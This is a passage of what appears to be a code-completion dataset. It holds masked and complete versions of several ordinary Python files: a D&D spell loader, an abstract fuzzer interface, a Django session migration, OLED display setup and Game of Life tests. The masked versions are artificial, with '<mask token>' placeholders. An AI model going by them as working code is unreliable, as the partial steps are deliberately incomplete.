spell['description'])\n if len(dice_size) > 0:\n spell_entry.damage_dice_size = dice_size[0]\n s_throw = re.findall('[A-Z]\\\\w+(?= saving throw)', spell[\n 'description'])\n if len(s_throw) == 1:\n s_throw = s_throw[0][:3].upper()\n spell_entry.save_type = s_throw\n if spell['level'] == 'cantrip':\n spell_entry.level = 'Cantrip'\n else:\n spell_entry.level = SPELL_LEVELS[spell['level']]\n if 'higher_levels' in spell.keys():\n spell_entry.higher_level = spell['higher_levels']\n if 'school' in spell.keys():\n spell_entry.school = SPELL_SCHOOL[spell['school'].title()]\n if 'casting_time' in spell.keys():\n if 'reaction' in spell['casting_time']:\n spell_entry.cast_time = CAST_TIME['1 Reaction']\n else:\n spell_entry.cast_time = spell['casting_time'].title()\n if 'Concentration' in spell['duration']:\n spell_entry.concentration = True\n spell_entry.duration = spell['duration'][15:].title()\n else:\n spell_entry.concentration = False\n spell_entry.duration = spell['duration']\n spell_entry.save()\n",
"step-4": "import re\nfrom django.core.management.base import BaseCommand\nfrom utils.spells import SPELLS\nfrom spells.models import Spell\nSPELL_SCHOOL = {'Abjuration': 'Abjuration', 'Conjuration': 'Conjuration',\n 'Divination': 'Divination', 'Enchantment': 'Enchantment', 'Evocation':\n 'Evocation', 'Illusion': 'Illusion', 'Necromancy': 'Necromancy',\n 'Transmutation': 'Transmutation'}\nCAST_TIME = {'1 Action': '1 Action', '1 Bonus Action': '1 Bonus Action',\n '1 Reaction': '1 Reaction', '1 Minute': '1 Minute', '10 Minutes':\n '10 Minutes', '1 Hour': '1 Hour', '8 Hours': '8 Hours', '12 Hours':\n '12 Hours', '24 Hours': '24 Hours', '1 Action or 8 Hours':\n '1 Action or 8 Hours'}\nSPELL_LEVELS = {'Cantrip': 'Cantrip', '1': '1st-level', '2': '2nd-level',\n '3': '3rd-level', '4': '4th-level', '5': '5th-level', '6': '6th-level',\n '7': '7th-level', '8': '8th-level', '9': '9th-level'}\n\n\nclass Command(BaseCommand):\n \"\"\"Command to populate the database with all spells for 5th Edition.\"\"\"\n help = (\n 'Will auto populate the database with all the Spells from 5th Edition Dungeons and Dragons.'\n )\n\n def handle(self, *args, **kwargs):\n for spell in SPELLS:\n spell_entry = Spell.objects.create(name=spell['name'], distance\n =spell['range'], ritual=spell['ritual'])\n if len(spell['classes']) > 1:\n spell_entry.available_to = ''\n for i in range(len(spell['classes'])):\n spell_entry.available_to += spell['classes'][i].title(\n ) + ', '\n else:\n spell_entry.available_to = spell['classes'][0].title()\n if 'components' in spell.keys():\n spell_entry.somatic = spell['components']['somatic']\n spell_entry.verbal = spell['components']['verbal']\n spell_entry.material = spell['components']['material']\n if spell_entry.material:\n spell_entry.specific_materials = ''\n for i in range(len(spell['components']['materials_needed'])\n ):\n spell_entry.specific_materials += spell['components'][\n 'materials_needed'][i] + ', '\n if 'description' in spell.keys():\n spell_entry.description = spell['description']\n dice_number = re.findall('\\\\d+(?=d)', spell['description'])\n if len(dice_number) > 0:\n spell_entry.damage_dice_number = dice_number[0]\n dice_size = re.findall('(?<=d)\\\\d+', spell['description'])\n if len(dice_size) > 0:\n spell_entry.damage_dice_size = dice_size[0]\n s_throw = re.findall('[A-Z]\\\\w+(?= saving throw)', spell[\n 'description'])\n if len(s_throw) == 1:\n s_throw = s_throw[0][:3].upper()\n spell_entry.save_type = s_throw\n if spell['level'] == 'cantrip':\n spell_entry.level = 'Cantrip'\n else:\n spell_entry.level = SPELL_LEVELS[spell['level']]\n if 'higher_levels' in spell.keys():\n spell_entry.higher_level = spell['higher_levels']\n if 'school' in spell.keys():\n spell_entry.school = SPELL_SCHOOL[spell['school'].title()]\n if 'casting_time' in spell.keys():\n if 'reaction' in spell['casting_time']:\n spell_entry.cast_time = CAST_TIME['1 Reaction']\n else:\n spell_entry.cast_time = spell['casting_time'].title()\n if 'Concentration' in spell['duration']:\n spell_entry.concentration = True\n spell_entry.duration = spell['duration'][15:].title()\n else:\n spell_entry.concentration = False\n spell_entry.duration = spell['duration']\n spell_entry.save()\n",
"step-5": "# python imports\nimport re\n\n# django imports\nfrom django.core.management.base import BaseCommand\n\n# module level imports\nfrom utils.spells import SPELLS\nfrom spells.models import Spell\n\nSPELL_SCHOOL = {\n 'Abjuration': 'Abjuration',\n 'Conjuration': 'Conjuration',\n 'Divination': 'Divination',\n 'Enchantment': 'Enchantment',\n 'Evocation': 'Evocation',\n 'Illusion': 'Illusion',\n 'Necromancy': 'Necromancy',\n 'Transmutation': 'Transmutation',\n}\n\nCAST_TIME = {\n '1 Action': '1 Action',\n '1 Bonus Action': '1 Bonus Action',\n '1 Reaction': '1 Reaction',\n '1 Minute': '1 Minute',\n '10 Minutes': '10 Minutes',\n '1 Hour': '1 Hour',\n '8 Hours': '8 Hours',\n '12 Hours': '12 Hours',\n '24 Hours': '24 Hours',\n '1 Action or 8 Hours': '1 Action or 8 Hours',\n}\n\nSPELL_LEVELS = {\n 'Cantrip': 'Cantrip',\n '1': '1st-level',\n '2': '2nd-level',\n '3': '3rd-level',\n '4': '4th-level',\n '5': '5th-level',\n '6': '6th-level',\n '7': '7th-level',\n '8': '8th-level',\n '9': '9th-level',\n}\n\n\nclass Command(BaseCommand):\n \"\"\"Command to populate the database with all spells for 5th Edition.\"\"\"\n\n # args\n help = 'Will auto populate the database with all the Spells from 5th Edition Dungeons and Dragons.'\n\n def handle(self, *args, **kwargs):\n\n for spell in SPELLS:\n spell_entry = Spell.objects.create(\n name=spell['name'],\n distance=spell['range'],\n ritual=spell['ritual'],\n )\n\n if len(spell['classes']) > 1:\n spell_entry.available_to = ''\n for i in range(len(spell['classes'])):\n spell_entry.available_to += spell['classes'][i].title() + ', '\n else:\n spell_entry.available_to = spell['classes'][0].title()\n\n if 'components' in spell.keys():\n spell_entry.somatic = spell['components']['somatic']\n spell_entry.verbal = spell['components']['verbal']\n spell_entry.material = spell['components']['material']\n\n if spell_entry.material:\n spell_entry.specific_materials = ''\n for i in range(len(spell['components']['materials_needed'])):\n spell_entry.specific_materials += spell['components']['materials_needed'][i] + ', '\n\n if 'description' in spell.keys():\n spell_entry.description = spell['description']\n\n dice_number = re.findall(r'\\d+(?=d)', spell['description'])\n if len(dice_number) > 0:\n spell_entry.damage_dice_number = dice_number[0]\n\n dice_size = re.findall(r'(?<=d)\\d+', spell['description'])\n if len(dice_size) > 0:\n spell_entry.damage_dice_size = dice_size[0]\n\n s_throw = re.findall(r\"[A-Z]\\w+(?= saving throw)\", spell['description'])\n if len(s_throw) == 1:\n s_throw = s_throw[0][:3].upper()\n spell_entry.save_type = s_throw\n\n if spell['level'] == 'cantrip':\n spell_entry.level = 'Cantrip'\n else:\n spell_entry.level = SPELL_LEVELS[spell['level']]\n\n if 'higher_levels' in spell.keys():\n spell_entry.higher_level = spell['higher_levels']\n\n if 'school' in spell.keys():\n spell_entry.school = SPELL_SCHOOL[spell['school'].title()]\n\n if 'casting_time' in spell.keys():\n if 'reaction' in spell['casting_time']:\n spell_entry.cast_time = CAST_TIME['1 Reaction']\n\n else:\n spell_entry.cast_time = spell['casting_time'].title()\n\n if 'Concentration' in spell['duration']:\n spell_entry.concentration = True\n spell_entry.duration = spell['duration'][15:].title()\n else:\n spell_entry.concentration = False\n spell_entry.duration = spell['duration']\n\n spell_entry.save()\n",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
__author__ = 'susperius'
"""
Abstract class used to implement own fuzzers
"""
class Fuzzer:
NAME = []
CONFIG_PARAMS = []
@classmethod
def from_list(cls, params):
raise NotImplementedError("ABSTRACT METHOD")
@property
def prng_state(self):
raise NotImplementedError("ABSTRACT METHOD")
def fuzz(self):
raise NotImplementedError("ABSTRACT METHOD")
def set_state(self, state):
raise NotImplementedError("ABSTRACT METHOD")
def set_seed(self, seed):
raise NotImplementedError("ABSTRACT METHOD")
def create_testcases(self, count, directory):
raise NotImplementedError("ABSTRACT METHOD")
@property
def file_type(self):
raise NotImplementedError("ABSTRACT METHOD")
|
normal
|
{
"blob_id": "aa2a268143856d8f33b1aaf24f4e28ffd95cab01",
"index": 4658,
"step-1": "<mask token>\n\n\nclass Fuzzer:\n <mask token>\n <mask token>\n\n @classmethod\n def from_list(cls, params):\n raise NotImplementedError('ABSTRACT METHOD')\n\n @property\n def prng_state(self):\n raise NotImplementedError('ABSTRACT METHOD')\n\n def fuzz(self):\n raise NotImplementedError('ABSTRACT METHOD')\n\n def set_state(self, state):\n raise NotImplementedError('ABSTRACT METHOD')\n\n def set_seed(self, seed):\n raise NotImplementedError('ABSTRACT METHOD')\n <mask token>\n\n @property\n def file_type(self):\n raise NotImplementedError('ABSTRACT METHOD')\n",
"step-2": "<mask token>\n\n\nclass Fuzzer:\n <mask token>\n <mask token>\n\n @classmethod\n def from_list(cls, params):\n raise NotImplementedError('ABSTRACT METHOD')\n\n @property\n def prng_state(self):\n raise NotImplementedError('ABSTRACT METHOD')\n\n def fuzz(self):\n raise NotImplementedError('ABSTRACT METHOD')\n\n def set_state(self, state):\n raise NotImplementedError('ABSTRACT METHOD')\n\n def set_seed(self, seed):\n raise NotImplementedError('ABSTRACT METHOD')\n\n def create_testcases(self, count, directory):\n raise NotImplementedError('ABSTRACT METHOD')\n\n @property\n def file_type(self):\n raise NotImplementedError('ABSTRACT METHOD')\n",
"step-3": "<mask token>\n\n\nclass Fuzzer:\n NAME = []\n CONFIG_PARAMS = []\n\n @classmethod\n def from_list(cls, params):\n raise NotImplementedError('ABSTRACT METHOD')\n\n @property\n def prng_state(self):\n raise NotImplementedError('ABSTRACT METHOD')\n\n def fuzz(self):\n raise NotImplementedError('ABSTRACT METHOD')\n\n def set_state(self, state):\n raise NotImplementedError('ABSTRACT METHOD')\n\n def set_seed(self, seed):\n raise NotImplementedError('ABSTRACT METHOD')\n\n def create_testcases(self, count, directory):\n raise NotImplementedError('ABSTRACT METHOD')\n\n @property\n def file_type(self):\n raise NotImplementedError('ABSTRACT METHOD')\n",
"step-4": "__author__ = 'susperius'\n<mask token>\n\n\nclass Fuzzer:\n NAME = []\n CONFIG_PARAMS = []\n\n @classmethod\n def from_list(cls, params):\n raise NotImplementedError('ABSTRACT METHOD')\n\n @property\n def prng_state(self):\n raise NotImplementedError('ABSTRACT METHOD')\n\n def fuzz(self):\n raise NotImplementedError('ABSTRACT METHOD')\n\n def set_state(self, state):\n raise NotImplementedError('ABSTRACT METHOD')\n\n def set_seed(self, seed):\n raise NotImplementedError('ABSTRACT METHOD')\n\n def create_testcases(self, count, directory):\n raise NotImplementedError('ABSTRACT METHOD')\n\n @property\n def file_type(self):\n raise NotImplementedError('ABSTRACT METHOD')\n",
"step-5": "__author__ = 'susperius'\n\n\"\"\"\nAbstract class used to implement own fuzzers\n\"\"\"\n\nclass Fuzzer:\n NAME = []\n CONFIG_PARAMS = []\n\n @classmethod\n def from_list(cls, params):\n raise NotImplementedError(\"ABSTRACT METHOD\")\n\n @property\n def prng_state(self):\n raise NotImplementedError(\"ABSTRACT METHOD\")\n\n def fuzz(self):\n raise NotImplementedError(\"ABSTRACT METHOD\")\n\n def set_state(self, state):\n raise NotImplementedError(\"ABSTRACT METHOD\")\n\n def set_seed(self, seed):\n raise NotImplementedError(\"ABSTRACT METHOD\")\n\n def create_testcases(self, count, directory):\n raise NotImplementedError(\"ABSTRACT METHOD\")\n\n @property\n def file_type(self):\n raise NotImplementedError(\"ABSTRACT METHOD\")",
"step-ids": [
7,
8,
9,
10,
11
]
}
|
[
7,
8,
9,
10,
11
] |
# Generated by Django 2.1.3 on 2019-01-06 06:53
import django.db.models.deletion
from django.conf import settings
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name="Session",
fields=[
(
"id",
models.AutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name="ID",
),
),
("token", models.CharField(editable=False, max_length=64, unique=True)),
("description", models.CharField(blank=True, max_length=512)),
("created_at", models.DateTimeField(auto_now_add=True)),
(
"last_seen_at",
models.DateTimeField(blank=True, editable=False, null=True),
),
(
"user",
models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE,
to=settings.AUTH_USER_MODEL,
),
),
],
),
]
|
normal
|
{
"blob_id": "a91d42764fa14111afca4551edd6c889903ed9bd",
"index": 8056,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Migration(migrations.Migration):\n <mask token>\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Migration(migrations.Migration):\n initial = True\n dependencies = [migrations.swappable_dependency(settings.AUTH_USER_MODEL)]\n operations = [migrations.CreateModel(name='Session', fields=[('id',\n models.AutoField(auto_created=True, primary_key=True, serialize=\n False, verbose_name='ID')), ('token', models.CharField(editable=\n False, max_length=64, unique=True)), ('description', models.\n CharField(blank=True, max_length=512)), ('created_at', models.\n DateTimeField(auto_now_add=True)), ('last_seen_at', models.\n DateTimeField(blank=True, editable=False, null=True)), ('user',\n models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=\n settings.AUTH_USER_MODEL))])]\n",
"step-4": "import django.db.models.deletion\nfrom django.conf import settings\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n initial = True\n dependencies = [migrations.swappable_dependency(settings.AUTH_USER_MODEL)]\n operations = [migrations.CreateModel(name='Session', fields=[('id',\n models.AutoField(auto_created=True, primary_key=True, serialize=\n False, verbose_name='ID')), ('token', models.CharField(editable=\n False, max_length=64, unique=True)), ('description', models.\n CharField(blank=True, max_length=512)), ('created_at', models.\n DateTimeField(auto_now_add=True)), ('last_seen_at', models.\n DateTimeField(blank=True, editable=False, null=True)), ('user',\n models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=\n settings.AUTH_USER_MODEL))])]\n",
"step-5": "# Generated by Django 2.1.3 on 2019-01-06 06:53\n\nimport django.db.models.deletion\nfrom django.conf import settings\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n initial = True\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ]\n\n operations = [\n migrations.CreateModel(\n name=\"Session\",\n fields=[\n (\n \"id\",\n models.AutoField(\n auto_created=True,\n primary_key=True,\n serialize=False,\n verbose_name=\"ID\",\n ),\n ),\n (\"token\", models.CharField(editable=False, max_length=64, unique=True)),\n (\"description\", models.CharField(blank=True, max_length=512)),\n (\"created_at\", models.DateTimeField(auto_now_add=True)),\n (\n \"last_seen_at\",\n models.DateTimeField(blank=True, editable=False, null=True),\n ),\n (\n \"user\",\n models.ForeignKey(\n on_delete=django.db.models.deletion.CASCADE,\n to=settings.AUTH_USER_MODEL,\n ),\n ),\n ],\n ),\n ]\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
import Adafruit_GPIO.SPI as SPI
import Adafruit_SSD1306
# Raspberry Pi pin configuration:
RST = 24
# Note the following are only used with SPI:
DC = 23
SPI_PORT = 0
SPI_DEVICE = 0
# Beaglebone Black pin configuration:
# RST = 'P9_12'
# Note the following are only used with SPI:
# DC = 'P9_15'
# SPI_PORT = 1
# SPI_DEVICE = 0
# 128x32 display with hardware I2C:
#disp = Adafruit_SSD1306.SSD1306_128_32(rst=RST)
# 128x64 display with hardware I2C:
#disp = Adafruit_SSD1306.SSD1306_128_64(rst=RST)
# Note you can change the I2C address by passing an i2c_address parameter like:
# disp = Adafruit_SSD1306.SSD1306_128_64(rst=RST, i2c_address=0x3C)
# Alternatively you can specify an explicit I2C bus number, for example
# with the 128x32 display you would use:
# disp = Adafruit_SSD1306.SSD1306_128_32(rst=RST, i2c_bus=2)
# 128x32 display with hardware SPI:
# disp = Adafruit_SSD1306.SSD1306_128_32(rst=RST, dc=DC, spi=SPI.SpiDev(SPI_PORT, SPI_DEVICE, max_speed_hz=8000000))
# 128x64 display with hardware SPI:
disp = Adafruit_SSD1306.SSD1306_128_64(rst=RST, dc=DC, spi=SPI.SpiDev(SPI_PORT, SPI_DEVICE, max_speed_hz=8000000))
# Alternatively you can specify a software SPI implementation by providing
# digital GPIO pin numbers for all the required display pins. For example
# on a Raspberry Pi with the 128x32 display you might use:
# disp = Adafruit_SSD1306.SSD1306_128_32(rst=RST, dc=DC, sclk=18, din=25, cs=22)
# Initialize library.
disp.begin()
# Clear display.
disp.clear()
disp.display()
|
normal
|
{
"blob_id": "d8cbed25f4c97be5a74a6e1f097fcb9fa9439a9a",
"index": 8160,
"step-1": "<mask token>\n",
"step-2": "<mask token>\ndisp.begin()\ndisp.clear()\ndisp.display()\n",
"step-3": "<mask token>\nRST = 24\nDC = 23\nSPI_PORT = 0\nSPI_DEVICE = 0\ndisp = Adafruit_SSD1306.SSD1306_128_64(rst=RST, dc=DC, spi=SPI.SpiDev(\n SPI_PORT, SPI_DEVICE, max_speed_hz=8000000))\ndisp.begin()\ndisp.clear()\ndisp.display()\n",
"step-4": "import Adafruit_GPIO.SPI as SPI\nimport Adafruit_SSD1306\nRST = 24\nDC = 23\nSPI_PORT = 0\nSPI_DEVICE = 0\ndisp = Adafruit_SSD1306.SSD1306_128_64(rst=RST, dc=DC, spi=SPI.SpiDev(\n SPI_PORT, SPI_DEVICE, max_speed_hz=8000000))\ndisp.begin()\ndisp.clear()\ndisp.display()\n",
"step-5": "import Adafruit_GPIO.SPI as SPI\nimport Adafruit_SSD1306\n\n# Raspberry Pi pin configuration:\nRST = 24\n# Note the following are only used with SPI:\nDC = 23\nSPI_PORT = 0\nSPI_DEVICE = 0\n\n# Beaglebone Black pin configuration:\n# RST = 'P9_12'\n# Note the following are only used with SPI:\n# DC = 'P9_15'\n# SPI_PORT = 1\n# SPI_DEVICE = 0\n\n# 128x32 display with hardware I2C:\n#disp = Adafruit_SSD1306.SSD1306_128_32(rst=RST)\n\n# 128x64 display with hardware I2C:\n#disp = Adafruit_SSD1306.SSD1306_128_64(rst=RST)\n\n# Note you can change the I2C address by passing an i2c_address parameter like:\n# disp = Adafruit_SSD1306.SSD1306_128_64(rst=RST, i2c_address=0x3C)\n\n# Alternatively you can specify an explicit I2C bus number, for example\n# with the 128x32 display you would use:\n# disp = Adafruit_SSD1306.SSD1306_128_32(rst=RST, i2c_bus=2)\n\n# 128x32 display with hardware SPI:\n# disp = Adafruit_SSD1306.SSD1306_128_32(rst=RST, dc=DC, spi=SPI.SpiDev(SPI_PORT, SPI_DEVICE, max_speed_hz=8000000))\n\n# 128x64 display with hardware SPI:\ndisp = Adafruit_SSD1306.SSD1306_128_64(rst=RST, dc=DC, spi=SPI.SpiDev(SPI_PORT, SPI_DEVICE, max_speed_hz=8000000))\n\n# Alternatively you can specify a software SPI implementation by providing\n# digital GPIO pin numbers for all the required display pins. For example\n# on a Raspberry Pi with the 128x32 display you might use:\n# disp = Adafruit_SSD1306.SSD1306_128_32(rst=RST, dc=DC, sclk=18, din=25, cs=22)\n\n# Initialize library.\ndisp.begin()\n\n# Clear display.\ndisp.clear()\ndisp.display()\n\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
class BoardTests(unittest.TestCase):
def test_get_neighbours(self):
board = create_test_board(3)
self.assertListEqual(board.get_neighbour_states(1, 0), [None, None,
ALIVE, ALIVE, DEAD, ALIVE, DEAD, None])
def test_simple_update(self):
alive_cells = [(0, 0), (1, 1), (0, 1)]
board = Board(3)
board.set_alive_cells(alive_cells)
board.update()
states = board.list_of_values
self.assertListEqual(states, [[1, 1, 0], [1, 1, 0], [0, 0, 0]])
<|reserved_special_token_0|>
<|reserved_special_token_0|>
class CellTest(unittest.TestCase):
def test_is_alive(self):
alive_cell = Cell(ALIVE)
self.assertTrue(alive_cell.is_alive)
dead_cell = Cell(DEAD)
self.assertFalse(dead_cell.is_alive)
def test_create_life(self):
cell = Cell(DEAD)
neighbours = [1, 1, 1, 0, 0, 0, 0, None, None]
self.assertTrue(cell.will_survive(neighbours))
def test_will_not_be_born(self):
cell = Cell(DEAD)
neighbours = [1, 1, 0, 0, 0, 0, 0]
self.assertFalse(cell.will_survive(neighbours))
neighbours = [1, 1, 1, 1, 0, 0, 0]
self.assertFalse(cell.will_survive(neighbours))
def test_stay_alive(self):
cell = Cell(ALIVE)
neighbours2 = [1, 1, 0, 0, 0, 0, None, None]
self.assertTrue(cell.will_survive(neighbours2))
neighbours3 = [1, 1, 1, 0, 0, 0, None, None]
self.assertTrue(cell.will_survive(neighbours3))
def test_will_not_survive_overpopulation(self):
cell = Cell(ALIVE)
neighbours = [1, 1, 1, 1, 0, 0, 0, 0]
self.assertFalse(cell.will_survive(neighbours))
def test_will_not_survive_underpopulation(self):
cell = Cell(ALIVE)
neighbours = [1, 0, 0, 0, 0, 0, 0]
self.assertFalse(cell.will_survive(neighbours))
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class BoardTests(unittest.TestCase):
def test_get_neighbours(self):
board = create_test_board(3)
self.assertListEqual(board.get_neighbour_states(1, 0), [None, None,
ALIVE, ALIVE, DEAD, ALIVE, DEAD, None])
def test_simple_update(self):
alive_cells = [(0, 0), (1, 1), (0, 1)]
board = Board(3)
board.set_alive_cells(alive_cells)
board.update()
states = board.list_of_values
self.assertListEqual(states, [[1, 1, 0], [1, 1, 0], [0, 0, 0]])
def test_simple_update2(self):
init_config = [(0, 0), (0, 1), (0, 2)]
board = Board(3)
board.set_alive_cells(init_config)
board.update()
states = board.list_of_values
self.assertListEqual(states, [[0, 1, 0], [0, 1, 0], [0, 0, 0]])
<|reserved_special_token_0|>
class CellTest(unittest.TestCase):
def test_is_alive(self):
alive_cell = Cell(ALIVE)
self.assertTrue(alive_cell.is_alive)
dead_cell = Cell(DEAD)
self.assertFalse(dead_cell.is_alive)
def test_create_life(self):
cell = Cell(DEAD)
neighbours = [1, 1, 1, 0, 0, 0, 0, None, None]
self.assertTrue(cell.will_survive(neighbours))
def test_will_not_be_born(self):
cell = Cell(DEAD)
neighbours = [1, 1, 0, 0, 0, 0, 0]
self.assertFalse(cell.will_survive(neighbours))
neighbours = [1, 1, 1, 1, 0, 0, 0]
self.assertFalse(cell.will_survive(neighbours))
def test_stay_alive(self):
cell = Cell(ALIVE)
neighbours2 = [1, 1, 0, 0, 0, 0, None, None]
self.assertTrue(cell.will_survive(neighbours2))
neighbours3 = [1, 1, 1, 0, 0, 0, None, None]
self.assertTrue(cell.will_survive(neighbours3))
def test_will_not_survive_overpopulation(self):
cell = Cell(ALIVE)
neighbours = [1, 1, 1, 1, 0, 0, 0, 0]
self.assertFalse(cell.will_survive(neighbours))
def test_will_not_survive_underpopulation(self):
cell = Cell(ALIVE)
neighbours = [1, 0, 0, 0, 0, 0, 0]
self.assertFalse(cell.will_survive(neighbours))
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def create_test_board(size):
board = Board(size)
board[0, 0].state = ALIVE
board[0, 1].state = ALIVE
board[2, 1].state = ALIVE
return board
class BoardTests(unittest.TestCase):
def test_get_neighbours(self):
board = create_test_board(3)
self.assertListEqual(board.get_neighbour_states(1, 0), [None, None,
ALIVE, ALIVE, DEAD, ALIVE, DEAD, None])
def test_simple_update(self):
alive_cells = [(0, 0), (1, 1), (0, 1)]
board = Board(3)
board.set_alive_cells(alive_cells)
board.update()
states = board.list_of_values
self.assertListEqual(states, [[1, 1, 0], [1, 1, 0], [0, 0, 0]])
def test_simple_update2(self):
init_config = [(0, 0), (0, 1), (0, 2)]
board = Board(3)
board.set_alive_cells(init_config)
board.update()
states = board.list_of_values
self.assertListEqual(states, [[0, 1, 0], [0, 1, 0], [0, 0, 0]])
def test_overpopulation(self):
init_config = [(0, 1), (1, 0), (1, 1), (1, 2), (2, 1)]
board = Board(3)
board.set_alive_cells(init_config)
board.update()
states = board.list_of_values
self.assertListEqual(states, [[1, 1, 1], [1, 0, 1], [1, 1, 1]])
class CellTest(unittest.TestCase):
def test_is_alive(self):
alive_cell = Cell(ALIVE)
self.assertTrue(alive_cell.is_alive)
dead_cell = Cell(DEAD)
self.assertFalse(dead_cell.is_alive)
def test_create_life(self):
cell = Cell(DEAD)
neighbours = [1, 1, 1, 0, 0, 0, 0, None, None]
self.assertTrue(cell.will_survive(neighbours))
def test_will_not_be_born(self):
cell = Cell(DEAD)
neighbours = [1, 1, 0, 0, 0, 0, 0]
self.assertFalse(cell.will_survive(neighbours))
neighbours = [1, 1, 1, 1, 0, 0, 0]
self.assertFalse(cell.will_survive(neighbours))
def test_stay_alive(self):
cell = Cell(ALIVE)
neighbours2 = [1, 1, 0, 0, 0, 0, None, None]
self.assertTrue(cell.will_survive(neighbours2))
neighbours3 = [1, 1, 1, 0, 0, 0, None, None]
self.assertTrue(cell.will_survive(neighbours3))
def test_will_not_survive_overpopulation(self):
cell = Cell(ALIVE)
neighbours = [1, 1, 1, 1, 0, 0, 0, 0]
self.assertFalse(cell.will_survive(neighbours))
def test_will_not_survive_underpopulation(self):
cell = Cell(ALIVE)
neighbours = [1, 0, 0, 0, 0, 0, 0]
self.assertFalse(cell.will_survive(neighbours))
if __name__ == '__main__':
unittest.main()
<|reserved_special_token_1|>
import unittest
from game_of_life.board import Board
from game_of_life.cell import Cell, ALIVE, DEAD
def create_test_board(size):
board = Board(size)
board[0, 0].state = ALIVE
board[0, 1].state = ALIVE
board[2, 1].state = ALIVE
return board
class BoardTests(unittest.TestCase):
def test_get_neighbours(self):
board = create_test_board(3)
self.assertListEqual(board.get_neighbour_states(1, 0), [None, None,
ALIVE, ALIVE, DEAD, ALIVE, DEAD, None])
def test_simple_update(self):
alive_cells = [(0, 0), (1, 1), (0, 1)]
board = Board(3)
board.set_alive_cells(alive_cells)
board.update()
states = board.list_of_values
self.assertListEqual(states, [[1, 1, 0], [1, 1, 0], [0, 0, 0]])
def test_simple_update2(self):
init_config = [(0, 0), (0, 1), (0, 2)]
board = Board(3)
board.set_alive_cells(init_config)
board.update()
states = board.list_of_values
self.assertListEqual(states, [[0, 1, 0], [0, 1, 0], [0, 0, 0]])
def test_overpopulation(self):
init_config = [(0, 1), (1, 0), (1, 1), (1, 2), (2, 1)]
board = Board(3)
board.set_alive_cells(init_config)
board.update()
states = board.list_of_values
self.assertListEqual(states, [[1, 1, 1], [1, 0, 1], [1, 1, 1]])
class CellTest(unittest.TestCase):
def test_is_alive(self):
alive_cell = Cell(ALIVE)
self.assertTrue(alive_cell.is_alive)
dead_cell = Cell(DEAD)
self.assertFalse(dead_cell.is_alive)
def test_create_life(self):
cell = Cell(DEAD)
neighbours = [1, 1, 1, 0, 0, 0, 0, None, None]
self.assertTrue(cell.will_survive(neighbours))
def test_will_not_be_born(self):
cell = Cell(DEAD)
neighbours = [1, 1, 0, 0, 0, 0, 0]
self.assertFalse(cell.will_survive(neighbours))
neighbours = [1, 1, 1, 1, 0, 0, 0]
self.assertFalse(cell.will_survive(neighbours))
def test_stay_alive(self):
cell = Cell(ALIVE)
neighbours2 = [1, 1, 0, 0, 0, 0, None, None]
self.assertTrue(cell.will_survive(neighbours2))
neighbours3 = [1, 1, 1, 0, 0, 0, None, None]
self.assertTrue(cell.will_survive(neighbours3))
def test_will_not_survive_overpopulation(self):
cell = Cell(ALIVE)
neighbours = [1, 1, 1, 1, 0, 0, 0, 0]
self.assertFalse(cell.will_survive(neighbours))
def test_will_not_survive_underpopulation(self):
cell = Cell(ALIVE)
neighbours = [1, 0, 0, 0, 0, 0, 0]
self.assertFalse(cell.will_survive(neighbours))
if __name__ == '__main__':
unittest.main()
<|reserved_special_token_1|>
import unittest
from game_of_life.board import Board
from game_of_life.cell import Cell, ALIVE, DEAD
def create_test_board(size):
board = Board(size)
board[0, 0].state = ALIVE
board[0, 1].state = ALIVE
board[2, 1].state = ALIVE
return board
class BoardTests(unittest.TestCase):
def test_get_neighbours(self):
board = create_test_board(3)
self.assertListEqual(board.get_neighbour_states(1, 0), [
None, None, ALIVE,
ALIVE, DEAD,
ALIVE, DEAD, None
])
def test_simple_update(self):
alive_cells = [(0, 0), (1, 1), (0, 1)]
board = Board(3)
board.set_alive_cells(alive_cells)
board.update()
states = board.list_of_values
self.assertListEqual(states, [
[1, 1, 0],
[1, 1, 0],
[0, 0, 0]
])
def test_simple_update2(self):
init_config = [(0, 0), (0, 1), (0, 2)]
board = Board(3)
board.set_alive_cells(init_config)
board.update()
states = board.list_of_values
self.assertListEqual(states, [
[0, 1, 0],
[0, 1, 0],
[0, 0, 0]
])
def test_overpopulation(self):
init_config = [(0, 1), (1, 0), (1, 1), (1, 2), (2, 1)]
board = Board(3)
board.set_alive_cells(init_config)
board.update()
states = board.list_of_values
self.assertListEqual(states, [
[1, 1, 1],
[1, 0, 1],
[1, 1, 1]
])
class CellTest(unittest.TestCase):
def test_is_alive(self):
alive_cell = Cell(ALIVE)
self.assertTrue(alive_cell.is_alive)
dead_cell = Cell(DEAD)
self.assertFalse(dead_cell.is_alive)
def test_create_life(self):
cell = Cell(DEAD)
neighbours = [1, 1, 1, 0, 0, 0, 0, None, None]
self.assertTrue(cell.will_survive(neighbours))
def test_will_not_be_born(self):
cell = Cell(DEAD)
neighbours = [1, 1, 0, 0, 0, 0, 0,]
self.assertFalse(cell.will_survive(neighbours))
neighbours = [1, 1, 1, 1, 0, 0, 0]
self.assertFalse(cell.will_survive(neighbours))
def test_stay_alive(self):
cell = Cell(ALIVE)
neighbours2 = [1, 1, 0, 0, 0, 0, None, None]
self.assertTrue(cell.will_survive(neighbours2))
neighbours3 = [1, 1, 1, 0, 0, 0, None, None]
self.assertTrue(cell.will_survive(neighbours3))
def test_will_not_survive_overpopulation(self):
cell = Cell(ALIVE)
neighbours = [1, 1, 1, 1, 0, 0, 0, 0]
